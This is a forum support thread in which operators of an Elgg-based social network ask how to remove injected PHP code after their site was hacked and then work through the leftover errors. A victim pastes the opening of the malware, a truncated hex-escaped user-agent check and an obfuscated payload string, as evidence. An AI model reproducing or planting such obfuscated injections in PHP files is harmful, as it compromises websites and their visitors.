PHP Injection after hacker attack

We are huge fans of Elgg, and we used to use it with our Cooperative Social Network called Coolmeia.

We suffer a hacker attack and now several (most of) .php files are with some sort of code injected:

http://net.coolmeia.org/groups/profile/805/horta-coletiva/

Is there a fast or efficient way to get rid of it to put website online again (after changing ftp/cpanel/etc passwords)

  • What makes you think an attacker has injected code? That is Elgg's own source code. It seems like for some reason your web server is printing the code instead of executing it.

  • Which Elgg version are you using? Do you have access to the server command line?

  • Hi Juno, thanks for your prompt answer. Because we had a strange behaviour in most our php files:

    <?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) && (! strstr($ua,"\x72\166\x3a\61\x31")) && (! strstr($ua,"\x61\156\x64\162\x6f\151\x64")) && (! strstr($ua,"\x6d\157\x62\151\x6c\145")) && (! strstr($ua,"\x69\160\x68\157\x6e\145")) && (! strstr($ua,"\x69\160\x61\144")) && (! strstr($ua,"\x6f\160\x65\162\x61\40\x6d"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $buwuuprfta = 'y76#<%x5c%x7825tmw!>!#]y84]275]y83]273x7825tzw>!#]y76]277]y72]265]y39]27**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7d]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825gj}Z;h!opjudovg}{;#)x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c5]241]334]368]322]3]364]6]283]427]36]373P6]36825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825tww**WYsboepn)%x5c%7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x78#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%7-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}c%x7824-%x5c%x7824<%x5c%x7825j,,*!|x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x563]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7%x5c%x782f20QUUI7jsv%x5c%x78257UFH]y39]252]y83]273]y72]282#<!%x5c

    ...continues...

    And, at the end of the file, it repeats "X" lines of code, differently on every php post...

    Ill check the elgg version and return. We have access to server command line, but im not the only that has experience on it, but can for sure find someone to deal with it.

  • You should be able to replace all core files with fresh copies of the same elgg version, same for any community plugins assuming you haven't hacked at them.  Then you only need to be concerned with any custom plugins for your project.

    This is where version control comes in handy, if you had it set up in git you could simply do:

    git reset --hard

    and be fixed.

  • Thanks Matt Beckett, for now on, this is the way we should proceed!

    We used some lorea plugins, some came with error and we adjust them, but with no record of what we exactly made.

    That is what happens when butchers and bakers try to deal with programming! Sorry for the inconvenience.

    Now we were able to get a little bit further, as you can see: http://net.coolmeia.org/index.php
     

  • I have three versions here. In version.php, we have 1.8.8, but i already have the elgg_master.zip and the 1.8.19...

    It's insane, but we're recovering manually all files...

    Sometimes we make same mistakes: http://net.coolmeia.org/activity >> "class, )); } else { echo "$icon"; } ?>"  - etc...

     

  • Now we finished to manually clean the duplicated codes.

    Now we have a different kind of error: http://net.coolmeia.org/groups/profile/153

    Fatal error:

    An unrecoverable error has occurred and has been logged. Contact the site administrator with the following information:

    Exception #1453948338.

  • And:

    Fatal error:

    elgg:subgroups is not a registered library

  • Can you share your file "/home/coolmeia/public_html/net/mod/widget_manager/views/default/page/layouts/widgets/add_panel.php"

    the missing ";" ca be due to a missing semicolon in any of the previous line or there is an issue with the opening and closing of the brackets...